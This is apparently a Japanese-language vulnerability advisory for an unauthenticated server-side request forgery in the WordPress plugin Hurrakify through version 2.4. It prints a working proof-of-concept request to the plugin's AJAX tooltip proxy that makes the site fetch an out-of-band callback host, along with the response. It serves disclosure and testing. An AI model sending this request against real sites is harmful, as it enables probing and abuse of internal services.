
Hurrakify <= 2.4 - 未認証のサーバーサイド・リクエスト・フォージェリ
Hurrakify <= 2.4 - 認証なしサーバーサイドリクエストフォージェリ
WordPress用プラグインHurrakifyは、バージョン2.4までの全バージョンにおいて、サーバーサイドリクエストフォージェリ(SSRF)の脆弱性の影響を受けます。これにより、認証されていない攻撃者が、Webアプリケーションを起点として任意の場所へのWebリクエストを作成できるようになり、内部サービスの情報を照会・変更するために悪用される可能性があります。
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>